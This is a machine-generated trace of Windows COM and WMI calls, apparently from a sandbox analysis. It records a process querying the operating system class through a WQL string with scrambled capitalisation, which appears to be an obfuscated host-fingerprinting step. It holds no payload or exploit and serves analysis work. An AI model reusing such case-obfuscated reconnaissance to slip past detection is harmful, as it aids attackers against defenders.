	[0127.601] IClientSecurity:QueryBlanket (in: This=0x2ad3bb2b3a0, pProxy=0x2ad22c91d40, pAuthnSvc=0xd7ef71cb10, pAuthzSvc=0xd7ef71cb0c, pServerPrincName=0xd7ef71cb38, pAuthnLevel=0xd7ef71cb08, pImpLevel=0xd7ef71cb24, pAuthInfo=0xd7ef71cb48, pCapabilites=0xd7ef71cb20 | out: pAuthnSvc=0xd7ef71cb10*=0xa, pAuthzSvc=0xd7ef71cb0c*=0x0, pServerPrincName=0xd7ef71cb38, pAuthnLevel=0xd7ef71cb08*=0x6, pImpLevel=0xd7ef71cb24*=0x3, pAuthInfo=0xd7ef71cb48, pCapabilites=0xd7ef71cb20*=0x1) returned 0x0
	[0127.601] IUnknown:Release (This=0x2ad3bb2b3a0) returned 0x1
	[0127.601] IUnknown:QueryInterface (in: This=0x2ad22c91d40, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cab8 | out: ppvObject=0xd7ef71cab8*=0x2ad3bb2b3e8) returned 0x0
	[0127.601] IUnknown:QueryInterface (in: This=0x2ad22c91d40, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ca48 | out: ppvObject=0xd7ef71ca48*=0x2ad3bb2b3a0) returned 0x0
	[0127.601] IClientSecurity:SetBlanket (This=0x2ad3bb2b3a0, pProxy=0x2ad22c91d40, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.602] IUnknown:Release (This=0x2ad3bb2b3a0) returned 0x2
	[0127.602] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x1
	[0127.602] CoTaskMemFree (pv=0x2ad3baca640) 
	[0127.602] WbemLocator:IUnknown:Release (This=0x2ad3bb1f7e0) returned 0x0
	[0127.602] IUnknown:QueryInterface (in: This=0x2ad22c91d40, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c730 | out: ppvObject=0xd7ef71c730*=0x2ad3bb2b3e8) returned 0x0
	[0127.602] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c7b0 | out: ppvObject=0xd7ef71c7b0*=0x0) returned 0x80004002
	[0127.602] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c548 | out: ppvObject=0xd7ef71c548*=0x0) returned 0x80004002
	[0127.602] IUnknown:AddRef (This=0x2ad3bb2b3e8) returned 0x3
	[0127.602] CoGetContextToken (in: pToken=0xd7ef71c400 | out: pToken=0xd7ef71c400) returned 0x0
	[0127.602] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3c0 | out: ppvObject=0xd7ef71c3c0*=0x2ad3bb2b2c8) returned 0x0
	[0127.603] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb2b2c8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c3f0 | out: pCid=0xd7ef71c3f0) returned 0x0
	[0127.603] IUnknown:Release (This=0x2ad3bb2b2c8) returned 0x3
	[0127.603] CoGetContextToken (in: pToken=0xd7ef71c3d0 | out: pToken=0xd7ef71c3d0) returned 0x0
	[0127.603] IUnknown:AddRef (This=0x2ad3bb2b3e8) returned 0x4
	[0127.603] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4e8 | out: ppvObject=0xd7ef71c4e8*=0x2ad3bb2b3b0) returned 0x0
	[0127.603] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x4
	[0127.603] IRpcOptions:Query (in: This=0x2ad3bb2b3b0, pPrx=0x2ad3bb2b3e8, dwProperty=2, pdwValue=0xd7ef71c558 | out: pdwValue=0xd7ef71c558) returned 0x80004002
	[0127.603] IUnknown:Release (This=0x2ad3bb2b3b0) returned 0x3
	[0127.603] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x2
	[0127.603] CoGetContextToken (in: pToken=0xd7ef71c8d0 | out: pToken=0xd7ef71c8d0) returned 0x0
	[0127.603] CoGetContextToken (in: pToken=0xd7ef71c810 | out: pToken=0xd7ef71c810) returned 0x0
	[0127.603] IUnknown:AddRef (This=0x2ad3bb2b3e8) returned 0x3
	[0127.603] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0xd7ef71c950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xd7ef71c930 | out: ppvObject=0xd7ef71c930*=0x2ad22c91d40) returned 0x0
	[0127.603] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x3
	[0127.603] IUnknown:Release (This=0x2ad22c91d40) returned 0x2
	[0127.604] IUnknown:Release (This=0x2ad22c91d40) returned 0x1
	[0127.604] SysStringLen (param_1=0x0) returned 0x0
	[0127.604] CoGetContextToken (in: pToken=0xd7ef71cf50 | out: pToken=0xd7ef71cf50) returned 0x0
	[0127.604] IUnknown:AddRef (This=0x2ad3bb2b3e8) returned 0x2
	[0127.604] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cb20 | out: ppvObject=0xd7ef71cb20*=0x2ad3bb2b3e8) returned 0x0
	[0127.604] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x2
	[0127.604] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x1
	[0127.604] CoGetContextToken (in: pToken=0xd7ef71cb70 | out: pToken=0xd7ef71cb70) returned 0x0
	[0127.604] CoGetContextToken (in: pToken=0xd7ef71cab0 | out: pToken=0xd7ef71cab0) returned 0x0
	[0127.604] IUnknown:AddRef (This=0x2ad3bb2b3e8) returned 0x2
	[0127.604] IUnknown:QueryInterface (in: This=0x2ad3bb2b3e8, riid=0xd7ef71cbf0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xd7ef71cbd0 | out: ppvObject=0xd7ef71cbd0*=0x2ad22c91d40) returned 0x0
	[0127.604] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x2
	[0127.604] IUnknown:AddRef (This=0x2ad22c91d40) returned 0x3
	[0127.604] IWbemServices:ExecQuery (in: This=0x2ad22c91d40, strQueryLanguage="WQL", strQuery="select * from Win32_OPERaTINgSyStem", lFlags=16, pCtx=0x0, ppEnum=0xd7ef71d068 | out: ppEnum=0xd7ef71d068*=0x2ad3bae1500) returned 0x0
	[0127.606] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cc78 | out: ppvObject=0xd7ef71cc78*=0x2ad3bae1508) returned 0x0
	[0127.606] IClientSecurity:QueryBlanket (in: This=0x2ad3bae1508, pProxy=0x2ad3bae1500, pAuthnSvc=0xd7ef71cc70, pAuthzSvc=0xd7ef71cc6c, pServerPrincName=0xd7ef71cc98, pAuthnLevel=0xd7ef71cc68, pImpLevel=0xd7ef71cc84, pAuthInfo=0xd7ef71cca8, pCapabilites=0xd7ef71cc80 | out: pAuthnSvc=0xd7ef71cc70*=0xa, pAuthzSvc=0xd7ef71cc6c*=0x0, pServerPrincName=0xd7ef71cc98, pAuthnLevel=0xd7ef71cc68*=0x6, pImpLevel=0xd7ef71cc84*=0x3, pAuthInfo=0xd7ef71cca8, pCapabilites=0xd7ef71cc80*=0x1) returned 0x0
	[0127.606] IUnknown:Release (This=0x2ad3bae1508) returned 0x1
	[0127.606] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cc18 | out: ppvObject=0xd7ef71cc18*=0x2ad3bb2b0a8) returned 0x0
	[0127.606] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cba8 | out: ppvObject=0xd7ef71cba8*=0x2ad3bae1508) returned 0x0
	[0127.606] IClientSecurity:SetBlanket (This=0x2ad3bae1508, pProxy=0x2ad3bae1500, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.614] IUnknown:Release (This=0x2ad3bae1508) returned 0x2
	[0127.614] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x1
	[0127.614] CoTaskMemFree (pv=0x2ad3bac9e60) 
	[0127.614] IUnknown:QueryInterface (in: This=0x2ad3bae1500, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c850 | out: ppvObject=0xd7ef71c850*=0x2ad3bb2b0a8) returned 0x0
	[0127.614] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c8d0 | out: ppvObject=0xd7ef71c8d0*=0x0) returned 0x80004002
	[0127.622] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c668 | out: ppvObject=0xd7ef71c668*=0x0) returned 0x80004002
	[0127.623] IUnknown:AddRef (This=0x2ad3bb2b0a8) returned 0x3
	[0127.624] CoGetContextToken (in: pToken=0xd7ef71c520 | out: pToken=0xd7ef71c520) returned 0x0
	[0127.624] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4e0 | out: ppvObject=0xd7ef71c4e0*=0x2ad3bb2af88) returned 0x0
	[0127.624] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb2af88, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c510 | out: pCid=0xd7ef71c510) returned 0x0
	[0127.624] IUnknown:Release (This=0x2ad3bb2af88) returned 0x3
	[0127.624] CoGetContextToken (in: pToken=0xd7ef71c4f0 | out: pToken=0xd7ef71c4f0) returned 0x0
	[0127.624] IUnknown:AddRef (This=0x2ad3bb2b0a8) returned 0x4
	[0127.624] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c608 | out: ppvObject=0xd7ef71c608*=0x2ad3bb2b070) returned 0x0
	[0127.624] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x4
	[0127.624] IRpcOptions:Query (in: This=0x2ad3bb2b070, pPrx=0x2ad3bb2b0a8, dwProperty=2, pdwValue=0xd7ef71c678 | out: pdwValue=0xd7ef71c678) returned 0x80004002
	[0127.624] IUnknown:Release (This=0x2ad3bb2b070) returned 0x3
	[0127.624] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x2
	[0127.624] CoGetContextToken (in: pToken=0xd7ef71c9f0 | out: pToken=0xd7ef71c9f0) returned 0x0
	[0127.624] CoGetContextToken (in: pToken=0xd7ef71c930 | out: pToken=0xd7ef71c930) returned 0x0
	[0127.624] IUnknown:AddRef (This=0x2ad3bb2b0a8) returned 0x3
	[0127.624] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0xd7ef71ca70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71ca50 | out: ppvObject=0xd7ef71ca50*=0x2ad3bae1500) returned 0x0
	[0127.624] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x3
	[0127.624] IUnknown:Release (This=0x2ad3bae1500) returned 0x2
	[0127.625] IUnknown:Release (This=0x2ad3bae1500) returned 0x1
	[0127.625] IUnknown:Release (This=0x2ad22c91d40) returned 0x2
	[0127.625] SysStringLen (param_1=0x0) returned 0x0
	[0127.625] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d090 | out: puCount=0xd7ef71d090*=0x2) returned 0x0
	[0127.625] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d090*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d090*=0x17, pszText=0x0) returned 0x0
	[0127.625] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.625] CoGetContextToken (in: pToken=0xd7ef71cc10 | out: pToken=0xd7ef71cc10) returned 0x0
	[0127.625] CoGetContextToken (in: pToken=0xd7ef71cb50 | out: pToken=0xd7ef71cb50) returned 0x0
	[0127.625] IUnknown:AddRef (This=0x2ad3bb2b0a8) returned 0x2
	[0127.625] IUnknown:QueryInterface (in: This=0x2ad3bb2b0a8, riid=0xd7ef71cc90*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71cc70 | out: ppvObject=0xd7ef71cc70*=0x2ad3bae1500) returned 0x0
	[0127.625] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x2
	[0127.625] IUnknown:AddRef (This=0x2ad3bae1500) returned 0x3
	[0127.625] IEnumWbemClassObject:Clone (in: This=0x2ad3bae1500, ppEnum=0xd7ef71d0d0 | out: ppEnum=0xd7ef71d0d0*=0x2ad3bb15740) returned 0x0
	[0127.629] IUnknown:QueryInterface (in: This=0x2ad3bb15740, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cd28 | out: ppvObject=0xd7ef71cd28*=0x2ad3bb15748) returned 0x0
	[0127.629] IClientSecurity:QueryBlanket (in: This=0x2ad3bb15748, pProxy=0x2ad3bb15740, pAuthnSvc=0xd7ef71cd20, pAuthzSvc=0xd7ef71cd1c, pServerPrincName=0xd7ef71cd48, pAuthnLevel=0xd7ef71cd18, pImpLevel=0xd7ef71cd34, pAuthInfo=0xd7ef71cd58, pCapabilites=0xd7ef71cd30 | out: pAuthnSvc=0xd7ef71cd20*=0xa, pAuthzSvc=0xd7ef71cd1c*=0x0, pServerPrincName=0xd7ef71cd48, pAuthnLevel=0xd7ef71cd18*=0x6, pImpLevel=0xd7ef71cd34*=0x3, pAuthInfo=0xd7ef71cd58, pCapabilites=0xd7ef71cd30*=0x1) returned 0x0
	[0127.629] IUnknown:Release (This=0x2ad3bb15748) returned 0x1
	[0127.629] IUnknown:QueryInterface (in: This=0x2ad3bb15740, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ccc8 | out: ppvObject=0xd7ef71ccc8*=0x2ad3bb2b248) returned 0x0
	[0127.630] IUnknown:QueryInterface (in: This=0x2ad3bb15740, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cc58 | out: ppvObject=0xd7ef71cc58*=0x2ad3bb15748) returned 0x0
	[0127.630] IClientSecurity:SetBlanket (This=0x2ad3bb15748, pProxy=0x2ad3bb15740, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0127.634] IUnknown:Release (This=0x2ad3bb15748) returned 0x2
	[0127.634] IUnknown:Release (This=0x2ad3bb2b248) returned 0x1
	[0127.634] CoTaskMemFree (pv=0x2ad3bac9f20) 
	[0127.634] IUnknown:QueryInterface (in: This=0x2ad3bb15740, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c8f0 | out: ppvObject=0xd7ef71c8f0*=0x2ad3bb2b248) returned 0x0
	[0127.634] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c970 | out: ppvObject=0xd7ef71c970*=0x0) returned 0x80004002
	[0127.635] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c708 | out: ppvObject=0xd7ef71c708*=0x0) returned 0x80004002
	[0127.635] IUnknown:AddRef (This=0x2ad3bb2b248) returned 0x3
	[0127.635] CoGetContextToken (in: pToken=0xd7ef71c5c0 | out: pToken=0xd7ef71c5c0) returned 0x0
	[0127.635] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c580 | out: ppvObject=0xd7ef71c580*=0x2ad3bb2b128) returned 0x0
	[0127.636] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb2b128, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c5b0 | out: pCid=0xd7ef71c5b0) returned 0x0
	[0127.636] IUnknown:Release (This=0x2ad3bb2b128) returned 0x3
	[0127.636] CoGetContextToken (in: pToken=0xd7ef71c590 | out: pToken=0xd7ef71c590) returned 0x0
	[0127.636] IUnknown:AddRef (This=0x2ad3bb2b248) returned 0x4
	[0127.636] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c6a8 | out: ppvObject=0xd7ef71c6a8*=0x2ad3bb2b210) returned 0x0
	[0127.636] IUnknown:Release (This=0x2ad3bb2b248) returned 0x4
	[0127.636] IRpcOptions:Query (in: This=0x2ad3bb2b210, pPrx=0x2ad3bb2b248, dwProperty=2, pdwValue=0xd7ef71c718 | out: pdwValue=0xd7ef71c718) returned 0x80004002
	[0127.636] IUnknown:Release (This=0x2ad3bb2b210) returned 0x3
	[0127.636] IUnknown:Release (This=0x2ad3bb2b248) returned 0x2
	[0127.636] CoGetContextToken (in: pToken=0xd7ef71ca90 | out: pToken=0xd7ef71ca90) returned 0x0
	[0127.636] CoGetContextToken (in: pToken=0xd7ef71c9d0 | out: pToken=0xd7ef71c9d0) returned 0x0
	[0127.636] IUnknown:AddRef (This=0x2ad3bb2b248) returned 0x3
	[0127.636] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0xd7ef71cb10*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71caf0 | out: ppvObject=0xd7ef71caf0*=0x2ad3bb15740) returned 0x0
	[0127.645] IUnknown:Release (This=0x2ad3bb2b248) returned 0x3
	[0127.645] IUnknown:Release (This=0x2ad3bb15740) returned 0x2
	[0127.645] IUnknown:Release (This=0x2ad3bb15740) returned 0x1
	[0127.645] IUnknown:Release (This=0x2ad3bae1500) returned 0x2
	[0127.645] SysStringLen (param_1=0x0) returned 0x0
	[0127.646] CoGetContextToken (in: pToken=0xd7ef71cf10 | out: pToken=0xd7ef71cf10) returned 0x0
	[0127.646] CoGetContextToken (in: pToken=0xd7ef71ce50 | out: pToken=0xd7ef71ce50) returned 0x0
	[0127.646] IUnknown:AddRef (This=0x2ad3bb2b248) returned 0x2
	[0127.646] IUnknown:QueryInterface (in: This=0x2ad3bb2b248, riid=0xd7ef71cf90*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xd7ef71cf70 | out: ppvObject=0xd7ef71cf70*=0x2ad3bb15740) returned 0x0
	[0127.646] IUnknown:Release (This=0x2ad3bb2b248) returned 0x2
	[0127.646] IUnknown:AddRef (This=0x2ad3bb15740) returned 0x3
	[0127.646] IEnumWbemClassObject:Reset (This=0x2ad3bb15740) returned 0x0
	[0127.647] IUnknown:Release (This=0x2ad3bb15740) returned 0x2
	[0127.647] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2e50
	[0127.647] IEnumWbemClassObject:Next (in: This=0x2ad3bb15740, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2e50, puReturned=0xd7ef71d198 | out: apObjects=0x2ad3bac2e50*=0x2ad206a7b00, puReturned=0xd7ef71d198*=0x1) returned 0x0
	[0127.657] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4c0 | out: ppvObject=0xd7ef71c4c0*=0x2ad206a7b00) returned 0x0
	[0127.657] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c540 | out: ppvObject=0xd7ef71c540*=0x0) returned 0x80004002
	[0127.657] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c2d8 | out: ppvObject=0xd7ef71c2d8*=0x0) returned 0x80004002
	[0127.657] IUnknown:AddRef (This=0x2ad206a7b00) returned 0x3
	[0127.657] CoGetContextToken (in: pToken=0xd7ef71c190 | out: pToken=0xd7ef71c190) returned 0x0
	[0127.657] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c150 | out: ppvObject=0xd7ef71c150*=0x2ad206a7b08) returned 0x0
	[0127.657] IMarshal:GetUnmarshalClass (in: This=0x2ad206a7b08, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c180 | out: pCid=0xd7ef71c180) returned 0x0
	[0127.657] IUnknown:Release (This=0x2ad206a7b08) returned 0x3
	[0127.657] CoGetContextToken (in: pToken=0xd7ef71c160 | out: pToken=0xd7ef71c160) returned 0x0
	[0127.657] IUnknown:AddRef (This=0x2ad206a7b00) returned 0x4
	[0127.658] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c278 | out: ppvObject=0xd7ef71c278*=0x0) returned 0x80004002
	[0127.658] IUnknown:Release (This=0x2ad206a7b00) returned 0x3
	[0127.658] IUnknown:Release (This=0x2ad206a7b00) returned 0x2
	[0127.658] CoGetContextToken (in: pToken=0xd7ef71c620 | out: pToken=0xd7ef71c620) returned 0x0
	[0127.658] CoGetContextToken (in: pToken=0xd7ef71c560 | out: pToken=0xd7ef71c560) returned 0x0
	[0127.658] IUnknown:AddRef (This=0x2ad206a7b00) returned 0x3
	[0127.658] IUnknown:QueryInterface (in: This=0x2ad206a7b00, riid=0xd7ef71c6a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71c680 | out: ppvObject=0xd7ef71c680*=0x2ad206a7b00) returned 0x0
	[0127.658] IUnknown:Release (This=0x2ad206a7b00) returned 0x3
	[0127.658] IUnknown:Release (This=0x2ad206a7b00) returned 0x2
	[0127.658] IUnknown:Release (This=0x2ad206a7b00) returned 0x1
	[0127.658] CoTaskMemFree (pv=0x2ad3bac2e50) 
	[0127.658] CoGetContextToken (in: pToken=0xd7ef71cfa0 | out: pToken=0xd7ef71cfa0) returned 0x0
	[0127.658] IUnknown:AddRef (This=0x2ad206a7b00) returned 0x2
	[0127.658] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d10c*=0, plFlavor=0xd7ef71d108*=0 | out: pVal=0xd7ef71d110*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d10c*=3, plFlavor=0xd7ef71d108*=64) returned 0x0
